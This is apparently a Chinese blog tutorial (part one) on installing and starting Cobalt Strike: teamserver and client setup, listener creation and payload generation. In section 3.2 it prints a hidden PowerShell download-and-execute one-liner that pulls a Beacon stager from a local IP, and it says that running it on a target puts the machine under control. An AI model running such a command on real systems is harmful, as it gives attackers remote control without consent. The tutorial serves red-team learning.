Cobalt Strike使用(一)
data:image/s3,"s3://crabby-images/2edca/2edca5e8788e2cc402f995fd2597a3b854d6e6a1" alt=""
基本使用
简介:
Cobalt Strike作为一款GUI的框架式渗透工具,集成了端口转发、服务扫描、自动化溢出、多模式端口监听、exe\dll\java木马生成、office宏病毒生成、木马捆绑;钓鱼攻击包括:站点克隆、目标信息获取、java执行、浏览器自动攻击等等。
运行环境:
Cobalt Strike4.3
首先安装使用前需要安装java环境jre
服务器:kali 或者 Debian会比较好,Ubuntu的话可能会有些端口占用的问题需要处理
客户端:安装jre即可使用(跨平台)
启动:
1. 创建服务器
./teamserver <host> <password> [/path/to/c2.profile] [YYYY-MM-DD]
[/path/to/c2.profile] is your Malleable C2 profile
[YYYY-MM-DD] is a kill date for Beacon payloads run from this server
data:image/s3,"s3://crabby-images/f5f23/f5f2310cda549b4a93df6d67933da60900471e13" alt="image-20210524214346922"
2. 客户端连接
- linux启动方式
./cobaltstrike
data:image/s3,"s3://crabby-images/92718/92718eccc7aee170536ae5e10ddf8ad18b5642da" alt="image-20210524214809083"
- Windows启动方式
data:image/s3,"s3://crabby-images/b80fb/b80fb7b7f036012b85caeaf9d045668c05f26099" alt="image-20210525144617108"
设置好同一个server端IP之后客户端之间可以在Event Log窗口聊天通信
3. 让目标连接上teamserver
3.1. 设置监听器
data:image/s3,"s3://crabby-images/9fc7e/9fc7e8f52b79de73aa960a3c1146952454c945c8" alt="image-20210525151153511"
3.2. 生成攻击载荷
在这里选择给我们的监听器添加一个攻击载荷
data:image/s3,"s3://crabby-images/bb34e/bb34e63997ba544c8b579778c65f0cd96003c9a9" alt="image-20210525152525524"
添加在和成功之后会有一个弹窗:我们保存这个弹窗中的powershell命令
data:image/s3,"s3://crabby-images/dff83/dff83a46207cfe6b437f2af242d5d0ef6f123d4d" alt="image-20210525152627340"
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.3.8:80/b'))"
我们可以看到这个powershell命令的作用是从连接处下载内容并以隐藏的方式执行
3.3. 在目标机上运行
在目标机让命令行运行这段powershell命令可以看到目标机上线
data:image/s3,"s3://crabby-images/463fd/463fdfeeed4180a3fec4aebd93f1d530ba7dd243" alt="image-20210525154736503"
- 标题: Cobalt Strike使用(一)
- 作者: xiaoeryu
- 创建于 : 2021-05-24 17:55:48
- 更新于 : 2021-05-26 17:32:31
- 链接: https://github.com/xiaoeryu/2021/05/24/Cobalt-Strike使用(一)/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。